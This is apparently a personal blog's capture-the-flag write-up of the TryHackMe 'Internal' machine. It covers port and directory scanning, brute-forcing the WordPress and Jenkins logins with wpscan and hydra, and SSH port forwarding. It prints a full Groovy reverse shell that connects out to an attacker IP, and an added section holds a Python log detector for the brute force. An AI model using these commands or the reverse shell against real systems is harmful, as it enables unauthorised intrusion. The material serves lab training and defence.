THM-OP-Internal

Mkd1R 2022-5-31 103 5/31

#Enumeration

-nmap

┌──(root㉿Mkd1R)-[~]
└─# nmap -sS -Pn -open -T4 -p- 10.10.187.154
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

-nmap2

┌──(root㉿Mkd1R)-[~]
└─# nmap -p22,80 -A 10.10.187.154
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   275.45 ms 10.18.0.1
2   275.92 ms internal.thm (10.10.187.154)

#Web Enumeration

-Gobuster

┌──(root㉿Mkd1R)-[~]
└─# gobuster dir -u internal.thm -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,json -o gbig2.txt
===============================================================
/blog                 (Status: 301) [Size: 311] [--> http://internal.thm/blog/]
/index.html           (Status: 200) [Size: 10918]
/wordpress            (Status: 301) [Size: 316] [--> http://internal.thm/wordpress/]
/javascript           (Status: 301) [Size: 317] [--> http://internal.thm/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://internal.thm/phpmyadmin/]
wpscan enumeration of vulnerable WP plugins: none. The user admin exists. phpmyadmin has no credentials to log in with.

wpscan --url http://internal.thm/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt  // try to brute-force the admin user's password

#Exploitation

Log in to WordPress with the recovered credentials; the next step is to edit the theme's 404.php to get a reverse shell.
Search the whole filesystem for txt files (find / -name "*.txt" 2>/dev/null) and you find a hint file: the box has a user aubreanna, and the password is given there too, so you can SSH straight in.
/var/www/html/wordpress/wp-config.php contains credentials, and those can be used to log in to phpmyadmin.

#Elevate privileges

After SSHing into the box, the home directory has a hint saying that 172.17.0.3:8000 is running; checking the network interfaces shows a docker interface, so use SSH to do port forwarding (ssh -L 1234:172.17.0.2:8080 aubreanna@internal.thm).
What comes up is a Jenkins instance. The default user is admin, and the password can be brute-forced with hydra or Burp using rockyou as the wordlist.
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 1234 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2f&Submit=Sign+in&Login=Login:Invalid username or password'
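As an added defender-side example (not part of the original write-up): the brute force above shows up as a burst of POSTs to Jenkins's /j_acegi_security_check endpoint, and this Python detector counts such POSTs per source address in a sliding window over access-log lines. The log lines are constructed here in Apache combined-log format; the source address 172.17.0.1 and the threshold of 10 attempts per 60 s are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/j_acegi_security_check"  # Jenkins form-login endpoint hydra posts to above

# Combined-log style line (assumed format): ip ident user [ts] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None if the line is not a request log."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?")[0], int(m["status"])

def detect_login_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: peak_count} for every source that POSTs to LOGIN_PATH at least
    `threshold` times inside any `window`-long sliding window."""
    recent = defaultdict(deque)  # ip -> login-POST timestamps still inside the window
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, _status = parsed
        if method != "POST" or path != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts[ip] = max(alerts.get(ip, 0), len(q))
    return alerts

def constructed_log():
    """Constructed sample: 12 login POSTs in 12 s from the docker bridge address, plus noise."""
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    base = datetime(2022, 7, 2, 21, 40, 0, tzinfo=timezone.utc)
    lines = [f'172.17.0.1 - - [{(base + timedelta(seconds=i)).strftime(fmt)}] '
             f'"POST {LOGIN_PATH} HTTP/1.1" 302 0' for i in range(12)]
    lines.append(f'172.17.0.1 - - [{base.strftime(fmt)}] "GET /login HTTP/1.1" 200 2048')
    lines.append(f'10.0.0.7 - - [{base.strftime(fmt)}] "POST {LOGIN_PATH} HTTP/1.1" 302 0')
    return lines
```

Because the attempts in this write-up arrive through an ssh -L tunnel, Jenkins sees them coming from the docker host's bridge address rather than from the attacker, so an alert like this should be correlated with the sshd session active on the host at that time.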

The brute force yields the Jenkins password spongebob; log in and get a reverse shell (Groovy run from the Jenkins script console; it connects back to the listener and pipes /bin/bash over the socket).
String host="10.18.123.159";
int port=2233;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();
A global search for txt files turns up a note.txt containing the root password.
From the low-privilege SSH session, su to root.
- THE END -

Mkd1R

July 2, 21:53

Last modified: 2 July 2022

Unless otherwise stated, all articles on this blog are the blogger's original work.